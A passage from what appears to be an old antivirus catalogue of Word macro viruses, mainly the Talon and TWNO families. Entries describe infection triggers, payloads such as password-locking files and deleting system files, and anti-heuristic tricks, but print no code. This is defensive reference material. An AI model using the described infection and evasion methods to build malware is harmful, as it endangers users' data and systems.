  24963. "   Talon #3, I Hope You Know The Password!!!   "
  24964.  
  24965. "   Brought To You By Talon 1997   "
  24966.  
  24967. Another difference between this new variant and the original
  24968. Talon virus is that the "ToolsMacro" menu option displays
  24969. the following information:
  24970.  
  24971. "    This option is not available now. Please install the   "
  24972. "    HELP files To continue.   "
  24973.  
  24974. [WORD_Talon.D]
  24975. Virus name: WORD_Talon.D
  24976. Virus Type: Word macro virus
  24977. Number of macros: 6
  24978. Encrypted: Yes
  24979. Macro names: Scramble, AutoClose, Info, AutoOpen, FileSaveAs,
  24980.              ToolsMacro
  24981. Size of macros: 2079 Bytes
  24982. Place of origin: USA
  24983. Date of origin: April 1997
  24984. Payload: Yes
  24985. Seen In-The-Wild: No
  24986. Description:
  24987.  
  24988. Talon.D infects the global template (normal.dot) when an
  24989. infected document is opened (AutoOpen). Further documents
  24990. become infected when they are saved (FileSaveAs) or closed
  24991. (AutoClose).
  24992.  
  24993. It triggers on Fridays when it saves the active document
  24994. with the password "  talon4  " and then loops through the
  24995. following message boxes:
  24996.  
  24997. "   Your document Is Infected With The Macro Virus Talon 4   "
  24998.  
  24999. "   Your document Has Just been Been Saved, I Hope You Know   "
  25000. "   The Password!!!   ",
  25001.  
  25002. "   Talon Strikes Again 1997   "
  25003.  
  25004. Another difference between this new variant and the original
  25005. Talon virus is that the "ToolsMacro" menu option displays the
  25006. following information:
  25007.  
  25008. "    This option is not available right now. Please install the   "
  25009. "    HELP files To continue.   "
  25010.  
  25011. [WORD_Talon.E]
  25012. Virus name: WORD_Talon.E
  25013. Virus Type: Word macro virus
  25014. Number of macros: 7
  25015. Encrypted: Yes
  25016. Macro names: Scramble, AutoClose, Info, Menu, AutoOpen,
  25017.              FileSaveAs, ToolsMacro
  25018. Size of macros: 2323 Bytes
  25019. Place of origin: USA
  25020. Date of origin: April 1997
  25021. Payload: Yes
  25022. Seen In-The-Wild: No
  25023. Description:
  25024.  
  25025. Talon.E infects the global template (normal.dot) when an
  25026. infected document is opened (AutoOpen). Further documents
  25027. become infected when they are saved (FileSaveAs) or closed
  25028. (AutoClose).
  25029.  
  25030. The main difference between this new variant and the
  25031. previous Talon viruses is that this virus adds a new menu item
  25032. (Talon). When a user selects the item, Talon.E triggers and the
  25033. active document is saved with the password "   talon5   ".
  25034.  
  25035. After that it enters a loop of message boxes:
  25036.  
  25037. "  Thank You so Much For Pressing That Button,   "
  25038. "  I Thought I Would Never Be Activated.   "
  25039.  
  25040. "  Word Macro Virus Talon 5   "
  25041.  
  25042. "   Talon Strikes Again   "
  25043.  
  25044. Another difference between this new variant and the original
  25045. Talon virus is that the "ToolsMacro" menu option displays the
  25046. following information:
  25047.  
  25048. "    This option is not available right now. Please install the   "
  25049. "    HELP files To continue.   "
  25050.  
  25051. [WORD_Talon.F]
  25052. Virus name: WORD_Talon.F
  25053. Virus Type: Word macro virus
  25054. Number of macros: 6
  25055. Encrypted: Yes
  25056. Macro names: Scramble, AutoClose, Info, AutoOpen,
  25057.              FileSaveAs, ToolsMacro
  25058. Size of macros: 2194 Bytes
  25059. Place of origin: USA
  25060. Date of origin: April 1997
  25061. Payload: Yes
  25062. Seen In-The-Wild: No
  25063. Description:
  25064.  
  25065. Talon.F infects the global template (normal.dot) when an
  25066. infected document is opened (AutoOpen). Further documents
  25067. become infected when they are saved (FileSaveAs) or closed
  25068. (AutoClose).
  25069.  
  25070. The main difference between this new variant and the previous
  25071. Talon viruses is that the virus author tried the anti-heuristic
  25072. techniques.
  25073.  
  25074. Another difference between this new variant and the very
  25075. similar Talon.D variant is that the "ToolsMacro" menu option
  25076. displays the following information:
  25077.  
  25078. "   Please Install The HELP Files To Continue   "
  25079. "   Option Not Installed   "
  25080.  
  25081. [WORD_Talon.G]
  25082. Virus name: WORD_Talon.G
  25083. Virus Type: Word macro virus
  25084. Number of macros: 7
  25085. Encrypted: No
  25086. Macro names: Scramble, AutoClose, Scramble2, AutoOpen,
  25087.              FileSaveAs, ToolsMacro, Mentor
  25088. Size of macros: 6280 Bytes
  25089. Place of origin: USA
  25090. Date of origin: April 1997
  25091. Payload: Yes
  25092. Seen In-The-Wild: No
  25093. Description:
  25094.  
  25095. Talon.G infects the global template (normal.dot) when an
  25096. infected document is opened (AutoOpen). Further documents
  25097. become infected when they are saved (FileSaveAs) or closed
  25098. (AutoClose).
  25099.  
  25100. The main difference between this new variant and the
  25101. previous Talon viruses is that Talon.G adds two menu items
  25102. to the Help file (called "Talon 5" and "About Talon 5").
  25103.  
  25104. When selected, Talon triggers and displays an article from the
  25105. virus author in the Microsoft Word macro editor.
  25106. It then prints 999 copies of the article and displays the
  25107. following messages:
  25108.  
  25109. "   Talon Strikes Again    "
  25110.  
  25111. "   Word Macro Virus Talon 5  AKA The Mentor   "
  25112.  
  25113. [WORD_Talon.H]
  25114. Virus name: WORD_Talon.H
  25115. Virus Type: Word macro virus
  25116. Number of macros: 4
  25117. Encrypted: Yes
  25118. Macro names: AutoClose, AutoOpen, Crud, FileSaveAs
  25119. Size of macros: 1923 Bytes
  25120. Place of origin: USA
  25121. Date of origin: April 1997
  25122. Payload: Yes
  25123. Seen In-The-Wild: No
  25124. Description:
  25125.  
  25126. Talon.H infects the global template (normal.dot) when an
  25127. infected document is opened (AutoOpen). Further documents
  25128. become infected when they are saved (FileSaveAs) or closed
  25129. (AutoClose).
  25130.  
  25131. The main difference between this new variant and the
  25132. previous Talon viruses is that Talon.H adds two menu items
  25133. (called Eifel Crud).
  25134.  
  25135. When selected, Talon.H triggers and saves the active
  25136. document with the password "  crud  ".
  25137. After that it creates a new document with the following text:
  25138.  
  25139. "   You are infected with the Eifel Crud!   "
  25140. "   Talon Strikes Again! 1997   "
  25141.  
  25142. Talon.H is another virus that devolves into Talon.H1 and
  25143. Talon.H2. This occurs when closing (AutoClose) a Talon.H infected
  25144. document and saving (FileSaveAs) a Talon.H1 infected file.
  25145.  
  25146. Due to the missing macros, Talon.H1 and Talon.H2 will
  25147. produce WordBasic error messages.
  25148.  
  25149. [WORD_Target.B (a.k.a LoneStar, Lone)]
  25150. Virus name: WORD_Target.B (a.k.a LoneStar, Lone)
  25151. Virus Type: Word macro virus
  25152. Number of macros: 1 (German version of Word)
  25153.                   2 (Any other version of Word)
  25154. Encrypted: Yes
  25155. Macro names: LoneRaider (LoneRaiderTwo)
  25156. Size of macros: 3463 Bytes
  25157. Place of origin: Germany
  25158. Date of origin: Unknown
  25159. Destructive: No
  25160. Common In-The-Wild: No
  25161.  
  25162. Target activates when the assigned key (SPACE) is pressed.
  25163. Target is an attempt to fool heuristic macro virus scanners. Its
  25164. virus macros do not contain the command to copy viruses.
  25165. Instead it creates a second macro (LoneRaiderTwo) and copies
  25166. all the commands for activation and infection into it. After
  25167. execution the second macro is deleted.  As a result, some
  25168. heuristic scanners do not flag Target as suspicious.  When
  25169. Target is activated from a non-German version of Microsoft
  25170. Word it will not spread and the second macro will not be
  25171. deleted.
  25172.  
  25173. Upon pressing "SPACE" on January 1st of each year, Target
  25174. creates a new document with the following text:
  25175.  
  25176. "   Enjoy the first F/WIN Killer!   "
  25177. "   LoneRaider!   "
  25178. "   Nightmare Joker   "
  25179. "   1996   "
  25180.  
  25181. When Target was released to the public, F-WIN Heuristic
  25182. Anti-Virus, written by Stefan Kurtzhals, was unable to detect
  25183. Target due to the reasons above. This was changed
  25184. immediately and every up-to-date anti-virus program should
  25185. be able to catch this virus.
  25186.  
  25187. [WORD_Tear.A]
  25188. Virus name: WORD_Tear.A
  25189. Virus Type: Word macro virus
  25190. Number of macros: 2
  25191. Encrypted: Yes
  25192. Macro names: AutoOpen, FileSaveAs)
  25193. Size of macros: 1684 Bytes
  25194. Place of origin: Russia
  25195. Date of origin: April 1997
  25196. Destructive: No
  25197. Seen In-The-Wild: No
  25198. Description:
  25199.  
  25200. Tear.A infects the global template (normal.dot) when an infected
  25201. document is opened. Further documents become infected when
  25202. they are saved (FileSaveAs).
  25203.  
  25204. The following comments can be found in the "AutoOpen" macro
  25205. code:
  25206.  
  25207. "   (c) 1997 Master of Infection   "
  25208. "   QUEEN FOREVER!!!   "
  25209. "   I love you,Freddie!!!   "
  25210. "   Here is my Mother's love!!!   "
  25211.  
  25212. "   I don't want to sleep with you   "
  25213. "   I don't need the passion too   "
  25214. "   I don't want a stormy affair   "
  25215. "   To make me feel my life is heading somewhere   "
  25216. "   All I want is comfort and care   "
  25217. "   Just to know that my woman gives me sweet -   "
  25218. "   Mother Love   "
  25219.  
  25220. "   I've walked too long in this lonely lane   "
  25221. "   I've had enough of this same old game   "
  25222. "   I'm a man of the world and they say that I'm strong   "
  25223. "   But my heart is heavy, and my hope is gone   "
  25224.  
  25225. "   Out in the city, in the cold world outside   "
  25226. "   I don't want to pity, just a safe place to hide   "
  25227. "   Mama please, let me back inside   "
  25228.  
  25229. "   I don't want to make no waves   "
  25230. "   But you can give me all the love that I crave   "
  25231. "   I can't take it if you see me cry   "
  25232. "   I long for peace before I die   "
  25233. "   All I want is to know that you're there   "
  25234. "   You're gonna give me all your sweet -   "
  25235. "   Mother Love   "
  25236.  
  25237. "   My body's aching, but I can't sleep   "
  25238. "   My dreams are all the company I keep   "
  25239. "   Got such a feeling as the sun goes down  "
  25240. "   I'm coming home to my sweet -  "
  25241. "   Mother Love   "
  25242.  
  25243. When an infected document is opened, Tear displays the
  25244. following message:
  25245.  
  25246. "   Tear it up!   "
  25247.  
  25248. [WORD_Tedious.A]
  25249. Virus name: WORD_Tedious.A
  25250. Virus Type: Word macro virus
  25251. Number of macros: 4
  25252. Encrypted: Yes
  25253. Macro names: AutoNew, FileSaveAs, VAutoNew, VFileSaveAs
  25254. Size of macros: 1082 Bytes
  25255. Place of origin: Unknown
  25256. Date of origin: August 1996
  25257. Payload: No
  25258. Common In-The-Wild: No
  25259. Description:
  25260.  
  25261. Tedious infects documents when the "FileSaveAs" command
  25262. is used.  Infected documents are converted internally to
  25263. templates which is very common for macro viruses.
  25264. Since Tedious uses English macro names it will not work with
  25265. Non-English versions of Microsoft Word.
  25266.  
  25267. Even though one major US anti-virus company reported
  25268. Tedious as being destructive, users do not need to fear this
  25269. virus.  Tedious is harmless and does nothing else besides
  25270. replicating.
  25271.  
  25272. [WORD_Tele.A (a.k.a LBYNJ, Telefonica, Tele-Sex)]
  25273. Virus name: WORD_Tele.A (a.k.a LBYNJ, Telefonica, Tele-Sex)
  25274. Virus Type: Word macro virus
  25275. Number of macros: 7
  25276. Encrypted: Yes
  25277. Macro names: AutoExec, AutoOpen, DateiBeenden, DateiDrucken,
  25278.              DateiNeu, DateiOeffnen, Telefonica
  25279. Size of macros: 22256 Bytes
  25280. Place of origin: Germany
  25281. Date of origin: April 1996
  25282. Destructive: Yes
  25283. Common In-The-Wild: No
  25284. Description:
  25285.  
  25286. Tele's "AutoExec" macro includes the infection routine for the
  25287. global template (normal.dot), which will not get infected when
  25288. inside the WIN.INI file (entry "Compatibility"), the string
  25289. "0x0030303" is set to "LBYNJ".
  25290.  
  25291. Tele uses the "Telefonica" macro to check for a previous
  25292. infection.  It will not infect the global template if the macro is
  25293. already present.
  25294.  
  25295. Documents are infected upon "DateiBeenden" ("FileClose"),
  25296. "DateiNeu" ("FileNew") and "DateiOeffnen" ("FileOpen"),
  25297. whereby at the end of "DateiOeffnen" ("FileOpen") the macro
  25298. "Telefonica" is called again.  Infected documents are changed
  25299. to templates, which is very common for macro viruses.
  25300.  
  25301. Tele has two destructive payloads. The first one can be found
  25302. in the "DateiDrucken" (FilePrint) macro. Upon printing a
  25303. document, Tele checks the system time and in case of a
  25304. value less than 10 in the seconds field, it will add the
  25305. following text at the end of the printed document:
  25306.  
  25307. "   Lucifer by Nightmare Joker (1996)   "
  25308.  
  25309. The second payload is activated from the "Telefonica" macro
  25310. when the second field has a value of 0 or 1. ("Telefonica" is
  25311. called from "AutoOpen", "AutoExec" and "DateiOeffnen"). If
  25312. this is the case, Tele creates a Debug script, (filename:
  25313. TELEFONI.SCR), inside the "C:\DOS" directory which
  25314. includes the DOS-based virus "Kampana.3784".
  25315.  
  25316. After creating the script file, LBYNJ executes the
  25317. "TELEFONI.BAT" batch file which uses the DOS command
  25318. "DEBUG.EXE" to convert the script file into an executable
  25319. DOS-based virus and then starts it.
  25320.  
  25321. [WORD_Temple.A]
  25322. Virus name: WORD_Temple.A
  25323. Virus Type: Word macro virus
  25324. Number of macros: 4
  25325. Encrypted: No
  25326. Macro names: AutoOpen (TempAutoOpen), TempAutoExec (AutoExec)
  25327.              TempFileOpen (FileOpen), TempFileSave (FileSave)
  25328. Size of macros: 1011 Bytes
  25329. Place of origin: Unknown
  25330. Date of origin: Spring 1997
  25331. Destructive: No
  25332. Seen In-The-Wild: No
  25333. Description:
  25334.  
  25335. Temple is another do-nothing macro virus. It is only infectious.
  25336.  
  25337. Temple.A infects the global template (normal.dot) when an
  25338. infected document is opened. Further documents become
  25339. infected when they are also opened (AutoOpen) or saved
  25340. (FileSaveAs).
  25341.  
  25342. [WORD_Theatre.A (a.k.a Taiwan.Theater)]
  25343. Virus name: WORD_Theatre.A (a.k.a Taiwan.Theater)
  25344. Virus Type: Word macro virus
  25345. Number of macros: 6
  25346. Encrypted: Yes
  25347. Macro names: AutoOpen, CK, CK1, DocClose, FileClose, ToolsMacro
  25348. Size of macros: 7495 Bytes
  25349. Place of origin: Taiwan
  25350. Date of origin: Unknown
  25351. Destructive: Yes
  25352. Seen In-The-Wild: No
  25353. Description:
  25354.  
  25355. Theatre is another macro virus written for the
  25356. Taiwanese/Chinese version of Microsoft Word.
  25357.  
  25358. It activates when an infected file is opened. Upon the 1st of
  25359. each month, Theatre triggers and deletes all the files in the
  25360. C:\ root directory. This leaves the computer unbootable.
  25361.  
  25362. The following messages are displayed:
  25363.  
  25364. "   TAIWAN THEATRE VIRUS by Dark Word   "
  25365. "   Hay..Hay..YOU GOT A THEATRE VIRUS.   "
  25366.  
  25367. [WORD_Theater.B]
  25368. Virus name: WORD_Theatre.B
  25369. Virus Type: Word macro virus
  25370. Number of macros: 4
  25371. Encrypted: Yes
  25372. Macro names: CK, DocClose, FileClose, ToolsMacro
  25373. Size of macros: 7495 Bytes
  25374. Place of origin: Taiwan
  25375. Date of origin: Unknown
  25376. Destructive: Yes
  25377. Seen In-The-Wild: No
  25378. Description:
  25379.  
  25380. Theatre.B is another macro virus written for the
  25381. Taiwanese/Chinese version of Microsoft Word.
  25382.  
  25383. The difference between this new variant and the original
  25384. Theatre virus is the trigger date and the displayed message.
  25385.  
  25386. Theatre.B deletes all the files in the C:\ root directory upon
  25387. reaching the 15th of each month.
  25388.  
  25389. It displays the following message:
  25390.  
  25391. "   THEATRE   "
  25392.  
  25393. Our Theatre.B virus sample also contains errors in the
  25394. "FileClose" macro, which results to no further infections.
  25395.  
  25396. [WORD_Toten.A:De]
  25397. Virus name: WORD_Toten.A:De
  25398. Virus Type: Word macro virus
  25399. Number of macros: 2
  25400. Encrypted: Yes
  25401. Macro names: README, AutoOpen (DateiSpeichern)
  25402. Size of macros: 2057 Bytes
  25403. Place of origin: Germany
  25404. Date of origin: Spring 1997
  25405. Payload: Yes
  25406. Seen In-The-Wild: Yes
  25407. Description:
  25408.  
  25409. Toten infects the global template (normal.dot) when an
  25410. infected document is opened. Further documents become
  25411. infected when they are saved (DateiSpeichern).
  25412.  
  25413. When Toten triggers, it encrypts documents with semi-random
  25414. passwords. If you find a document with an unknown password,
  25415. please download a copy of WinWord Password Recovery Tool
  25416. (wwprt).  It is available at: www.vdsarg.com.
  25417.  
  25418. When a document is saved on February 1, 2000, Toten displays
  25419. the following German message:
  25420.  
  25421. "   Der Virus wurde von M.N. aus Schwelm (BRD)am 08.06.1996   "
  25422. "   programmiert. Ich bin ein Hosen Fan.    "
  25423.  
  25424. Toten contains several other comments related to the German
  25425. punk music group: "  Die Toten Hosen  ".
  25426.  
  25427. Toten.A uses language specific macros, therefore it only
  25428. works with the German version of Microsoft Word.
  25429.  
  25430. [WORD_Twister.A]
  25431. Virus name: WORD_Twister.A
  25432. Virus Type: Word macro virus
  25433. Number of macros: 8
  25434. Encrypted: No
  25435. Macro names: FileSaveAs, AutoExec, twAC, FileSave, AutoExit,
  25436.              twFC, twFE, twFQ, twFSA, twAE, AutoClose, twFS,
  25437.              twEX, FileClose, FileExit, FileQuit
  25438. Size of macros: 4628 Bytes
  25439. Place of origin: Unknown
  25440. Date of origin: Unknown
  25441. Payload: No
  25442. Seen In-The-Wild: No
  25443. Description:
  25444.  
  25445. Twister is a very simple virus that does nothing but replicate.
  25446. It has 2 sets of macros: one for infecting the global template
  25447. the other for infecting documents. It swaps them upon activation
  25448. and upon infection.
  25449.  
  25450. The AutoExec macro contains the following text string:
  25451.  
  25452. "   Twister 2000" v.1 (c) Neo-Luddite Inc.   "
  25453. "   For Robin Hood   "
  25454.  
  25455. [WORD_TWNO.A (a.k.a. Taiwan_1)]
  25456. Virus name: WORD_TWNO.A (a.k.a. Taiwan_1)
  25457. Virus Type: Word macro virus
  25458. Alias: WORD_Taiwan.No-1
  25459. Number of macros: 1 or 3
  25460. Encrypted: No
  25461. Macro names: AutoOpen, AutoNew, AutoClose
  25462. Size of macros: 1567 Bytes in .doc files
  25463.                 4701 Bytes in global template
  25464. Place of origin: Taiwan
  25465. Date of origin: Unknown
  25466. Payload: Yes
  25467. Seen In-The-Wild: Yes
  25468. Description:
  25469.  
  25470. TWNO was the first macro virus written for the
  25471. Taiwanese/Chinese version of Microsoft Word.
  25472.  
  25473. TWNO infects the global template (normal.dot) when an
  25474. infected document is opened.  Further documents become
  25475. infected when they are opened (AutoOpen), closed
  25476. (AutoClose) or when a new document is created (AutoNew).
  25477.  
  25478. While TWNO has only one macro in infected documents,
  25479. it copies and renames it to 3 macros in the global template.
  25480.  
  25481. On the 13th of each month TWNO inserts text into the active
  25482. document and then displays the following message:
  25483.  
  25484. "   NO_1 Macro Virus   "
  25485.  
  25486.  
  25487. [WORD_Taiwan.No-1]
  25488. Virus name: WORD_Taiwan.No-1
  25489. Virus Type: Word macro virus
  25490. Alias: WORD_TWNO.A
  25491. Number of macros: 1 or 3
  25492. Encrypted: No
  25493. Macro names: AutoOpen, AutoNew, AutoClose
  25494. Size of macros: 1567 Bytes in .doc files
  25495.                 4701 Bytes in global template
  25496. Place of origin: Taiwan
  25497. Date of origin: Unknown
  25498. Payload: Yes
  25499. Seen In-The-Wild: Yes
  25500. Description:
  25501.  
  25502. TWNO was the first macro virus written for the
  25503. Taiwanese/Chinese version of Microsoft Word.
  25504.  
  25505. TWNO infects the global template (normal.dot) when an
  25506. infected document is opened.  Further documents become
  25507. infected when they are opened (AutoOpen), closed
  25508. (AutoClose) or when a new document is created (AutoNew).
  25509.  
  25510. While TWNO has only one macro in infected documents,
  25511. it copies and renames it to 3 macros in the global template.
  25512.  
  25513. On the 13th of each month TWNO inserts text into the active
  25514. document and then displays the following message:
  25515.  
  25516. "   NO_1 Macro Virus   "
  25517.  
  25518.  
  25519.  
  25520. [WORD_TWNO.B (a.k.a. KillMario)]
  25521. Virus name: WORD_TWNO.B (a.k.a. KillMario)
  25522. Virus Type: Word macro virus
  25523. Number of macros: 1 or 3
  25524. Encrypted: No
  25525. Macro names: AutoExec, AutoNew, AutoClose
  25526. Size of macros: 1387 Bytes in .doc files
  25527.                 4161 Bytes in global template
  25528. Place of origin: Taiwan
  25529. Date of origin: Unknown
  25530. Payload: No
  25531. Seen In-The-Wild: No
  25532. Description:
  25533.  
  25534. TWNO.B is another virus written for the Taiwanese/
  25535. Chinese version of Microsoft Word.
  25536.  
  25537. The difference between this new variant and the original
  25538. TWNO.A virus is that TWNO.B contains the "AutoExec"
  25539. macro instead of the "AutoOpen" macro.
  25540.  
  25541. The submitted first generation sample is also not capable of
  25542. further infecting documents. Microsoft Word is halted when
  25543. the user starts Word from an already infected global template.
  25544.  
  25545. [WORD_TWNO.C]
  25546. Virus name: WORD_TWNO.C
  25547. Virus Type: Word macro virus
  25548. Number of macros: 1 or 3 (global template)
  25549. Encrypted: No
  25550. Macro names: AutoOpen (AutoNew, AutoClose)
  25551. Size of macros: 1404 Bytes in documents
  25552.                 4212 Bytes in global template
  25553. Place of origin: Taiwan
  25554. Date of origin: Fall 1996
  25555. Destructive: Yes
  25556. Seen In-The-Wild: No
  25557. Description:
  25558.  
  25559. TWNO.C is another virus written for the Taiwanese/Chinese
  25560. version of Microsoft Word.
  25561.  
  25562. The difference between this new variant and the previous
  25563. TWNO.B virus is that it contains an "AutoOpen" macro
  25564. instead of "AutoExec".
  25565.  
  25566. TWNO.C infects the global template when an infected
  25567. document is opened. Further documents become infected
  25568. when they are closed (AutoClose), created (AutoNew) or
  25569. opened (AutoOpen).
  25570.  
  25571. While TWNO.B is not capable of further infecting documents,
  25572. TWNO.C is able to infect new documents and also execute its
  25573. destructive payloads.
  25574.  
  25575. On the 28th of each month, TWNO.C asks a question and
  25576. depending on the answer, it executes one of its two payloads:
  25577.  
  25578. 1. It deletes CONFIG.SYS, AUTOEXEC.BAT, and COMMAND.COM!
  25579.  
  25580. 2. It deletes all files in the C:\DOS and C:\ET3 directory.
  25581.  
  25582. On the 1st of each month, TWNO.C deletes the following files:
  25583.  
  25584. C:\COMMAND.COM
  25585. C:\AUTOEXEC.BAT
  25586. C:\CONFIG.SYS
  25587.  
  25588. [WORD_TWNO.D]
  25589. Virus name: WORD_TWNO.D
  25590. Virus Type: Word macro virus
  25591. Number of macros: 1 or 3 (global template)
  25592. Encrypted: No
  25593. Macro names: AutoOpen (AutoNew, AutoClose)
  25594. Size of macros: 2105 Bytes in documents
  25595.                 6315 Bytes in global template
  25596. Place of origin: Taiwan
  25597. Date of origin: Fall 1996
  25598. Destructive: Yes
  25599. Seen In-The-Wild: No
  25600. Description:
  25601.  
  25602. TWNO.D is another virus written for the Taiwanese/Chinese
  25603. version of Microsoft Word. Compared to previous TWNO
  25604. viruses, its WordBasic code has been rewritten.
  25605.  
  25606. TWNO.D infects the global template when an infected
  25607. document is opened. Further documents become infected when
  25608. they are closed (AutoClose), created (AutoNew) or opened
  25609. (AutoOpen).
  25610.  
  25611. On the 25th of each month, TWNO.D changes the Word
  25612. menubar items and then asks a question to the user. Depending
  25613. on the answer, it deletes the following files:
  25614.  
  25615. "C:\DOS\*.*"
  25616. "C:\WINDOWS\*.INI"
  25617.  
  25618. After that TWNO.D shows 3 different messages.
  25619.  
  25620. On the 15th of each month, TWNO.D deletes the following files:
  25621.  
  25622. "C:\COMMAND.COM"
  25623. "C:\CONFIG.SYS"
  25624. "C:\MSDOS.SYS"
  25625. "C:\IO.SYS"
  25626.  
  25627. [WORD_TWNO.K]
  25628. Virus name: WORD_TWNO.K
  25629. Virus Type: Word macro virus
  25630. Number of macros: 1 or 3 (global template)
  25631. Encrypted: No
  25632. Macro names: AutoOpen (AutoNew, AutoClose)
  25633. Size of macros: 1403 Bytes in documents
  25634.                 4209 Bytes in global template
  25635. Place of origin: Taiwan
  25636. Date of origin: Fall 1996
  25637. Destructive: Yes
  25638. Seen In-The-Wild: No
  25639. Description:
  25640.  
  25641. TWNO.K is another virus written for the Taiwanese/Chinese
  25642. version of Microsoft Word.
  25643.  
  25644. The difference between this new variant and the previous
  25645. TWNO.C virus is that the code was slightly modified.
  25646.  
  25647. TWNO.K infects the global template when an infected
  25648. document is opened. Further documents become infected when
  25649. they are closed (AutoClose), created (AutoNew) or opened
  25650. (AutoOpen).
  25651.  
  25652. For additional information, please refer to the TWNO.C virus
  25653. description.
  25654.  
  25655. [WORD_TWNO.L]
  25656. Virus name: WORD_TWNO.L
  25657. Virus Type: Word macro virus
  25658. Number of macros: 1 or 3 (global template)
  25659. Encrypted: No
  25660. Macro names: AutoOpen (AutoNew, AutoClose)
  25661. Size of macros: 1402 Bytes in documents
  25662.                 4206 Bytes in global template
  25663. Place of origin: Taiwan
  25664. Date of origin: Fall 1996
  25665. Destructive: Yes
  25666. Seen In-The-Wild: No
  25667. Description:
  25668.  
  25669. TWNO.L is another virus written for the Taiwanese/Chinese
  25670. version of Microsoft Word.  The difference between this new
  25671. variant and the previous TWNO.C virus is that the code was
  25672. slightly modified.
  25673.  
  25674. TWNO.L infects the global template when an infected
  25675. document is opened. Further documents become infected
  25676. when they are closed (AutoClose), created (AutoNew) or
  25677. opened (AutoOpen).
  25678.  
  25679. For additional information, please refer to the TWNO.C virus
  25680. description.
  25681.  
  25682.  
  25683. [WORD_TWNO.M]
  25684. Virus name: WORD_TWNO.M
  25685. Virus Type: Word macro virus
  25686. Number of macros: 1 or 3 (global template)
  25687. Encrypted: No
  25688. Macro names: AutoOpen (AutoNew, AutoClose)
  25689. Size of macros: 1392 Bytes in documents
  25690.                 4176 Bytes in global template
  25691. Place of origin: Taiwan
  25692. Date of origin: Fall 1996
  25693. Destructive: Yes
  25694. Seen In-The-Wild: No
  25695. Description:
  25696.  
  25697. TWNO.M is another virus written for the Taiwanese/Chinese
  25698. version of Microsoft Word. The difference between this new
  25699. variant and the previous TWNO.C virus is that the code was
  25700. slightly modified.
  25701.  
  25702. TWNO.M infects the global template when an infected
  25703. document is opened. Further documents become infected
  25704. when they are closed (AutoClose), created (AutoNew) or
  25705. opened (AutoOpen).
  25706.  
  25707. For additional information, please refer to the TWNO.C virus
  25708. description.
  25709.  
  25710. [WORD_TWNO.N]
  25711. Virus name: WORD_TWNO.N
  25712. Virus Type: Word macro virus
  25713. Number of macros: 1 or 3 (global template)
  25714. Encrypted: No
  25715. Macro names: AutoOpen (AutoNew, AutoClose)
  25716. Size of macros: 1264 Bytes in documents
  25717.                 3792 Bytes in global template
  25718. Place of origin: Taiwan
  25719. Date of origin: Fall 1996
  25720. Destructive: Yes
  25721. Seen In-The-Wild: No
  25722. Description:
  25723.  
  25724. TWNO.N is another virus written for the Taiwanese/Chinese
  25725. version of Microsoft Word. The difference between this new
  25726. variant and the previous TWNO.C virus is that the code was
  25727. slightly modified.
  25728.  
  25729. TWNO.N infects the global template when an infected
  25730. document is opened. Further documents become infected
  25731. when they are closed (AutoClose), created (AutoNew) or
  25732. opened (AutoOpen).
  25733.  
  25734. For additional information, please refer to the TWNO.C virus
  25735. description.
  25736.  
  25737. [WORD_TWNO.O]
  25738. Virus name: WORD_TWNO.O
  25739. Virus Type: Word macro virus
  25740. Number of macros: 1 or 3 (global template)
  25741. Encrypted: No
  25742. Macro names: AutoOpen (AutoNew, AutoClose)
  25743. Size of macros: 1406 Bytes in documents
  25744.                 4218 Bytes in global template
  25745. Place of origin: Taiwan
  25746. Date of origin: Fall 1996
  25747. Destructive: Yes
  25748. Seen In-The-Wild: No
  25749. Description:
  25750.  
  25751. TWNO.O is another virus written for the Taiwanese/Chinese
  25752. version of Microsoft Word.
  25753.  
  25754. The difference between this new variant and the previous
  25755. TWNO.C virus is that the code was slightly modified.
  25756.  
  25757. TWNO.O infects the global template when an infected
  25758. document is opened. Further documents become infected
  25759. when they are closed (AutoClose), created (AutoNew) or
  25760. opened (AutoOpen).
  25761.  
  25762. For additional information, please refer to the TWNO.C virus
  25763. description.
  25764.  
  25765. [WORD_TWNO.P]
  25766. Virus name: WORD_TWNO.P
  25767. Virus Type: Word macro virus
  25768. Number of macros: 1 or 3 (global template)
  25769. Encrypted: No
  25770. Macro names: AutoOpen (AutoNew, AutoClose)
  25771. Size of macros: 1404 Bytes in documents
  25772.                 4212 Bytes in global template
  25773. Place of origin: Taiwan
  25774. Date of origin: Fall 1996
  25775. Destructive: Yes
  25776. Seen In-The-Wild: No
  25777. Description:
  25778.  
  25779. TWNO.P is another virus written for the Taiwanese/Chinese
  25780. version of Microsoft Word.
  25781.  
  25782. The difference between this new variant and the previous
  25783. TWNO.C virus is that the code was slightly modified.
  25784.  
  25785. TWNO.P infects the global template when an infected
  25786. document is opened. Further documents become infected
  25787. when they are closed (AutoClose), created (AutoNew) or
  25788. opened (AutoOpen).
  25789.  
  25790. For additional information, please refer to the TWNO.C virus
  25791. description.
  25792.  
  25793. [WORD_TWNO.Q]
  25794. Virus name: WORD_TWNO.Q
  25795. Virus Type: Word macro virus
  25796. Number of macros: 1 or 3 (global template)
  25797. Encrypted: No
  25798. Macro names: AutoOpen (AutoNew, AutoClose)
  25799. Size of macros: 1286 Bytes in documents
  25800.                 3858 Bytes in global template
  25801. Place of origin: Taiwan
  25802. Date of origin: Fall 1996
  25803. Destructive: Yes
  25804. Seen In-The-Wild: No
  25805. Description:
  25806.  
  25807. TWNO.Q is another virus written for the Taiwanese/Chinese
  25808. version of Microsoft Word.
  25809.  
  25810. The difference between this new variant and the previous
  25811. TWNO.C virus is that the code was slightly modified.
  25812.  
  25813. TWNO.Q infects the global template when an infected
  25814. document is opened. Further documents become infected
  25815. when they are closed (AutoClose), created (AutoNew) or
  25816. opened (AutoOpen).
  25817.  
  25818. For additional information, please refer to the TWNO.C virus
  25819. description.
  25820.  
  25821. [WORD_TWNO.R]
  25822. Virus name: WORD_TWNO.R
  25823. Virus Type: Word macro virus
  25824. Number of macros: 1 or 3 (global template)
  25825. Encrypted: No
  25826. Macro names: AutoOpen (AutoNew, AutoClose)
  25827. Size of macros: 1214 Bytes in documents
  25828.                          3642 Bytes in global template
  25829. Place of origin: Taiwan
  25830. Date of origin: Fall 1996
  25831. Destructive: Yes
  25832. Seen In-The-Wild: No
  25833. Description:
  25834.  
  25835. TWNO.R is another virus written for the Taiwanese/Chinese
  25836. version of Microsoft Word.
  25837.  
  25838. The difference between this new variant and the previous
  25839. TWNO.C virus is that the code was slightly modified.
  25840.  
  25841. TWNO.R infects the global template when an infected
  25842. document is opened. Further documents become infected
  25843. when they are closed (AutoClose), created (AutoNew) or
  25844. opened (AutoOpen).
  25845.  
  25846. For additional information, please refer to the TWNO.C virus
  25847. description.
  25848.  
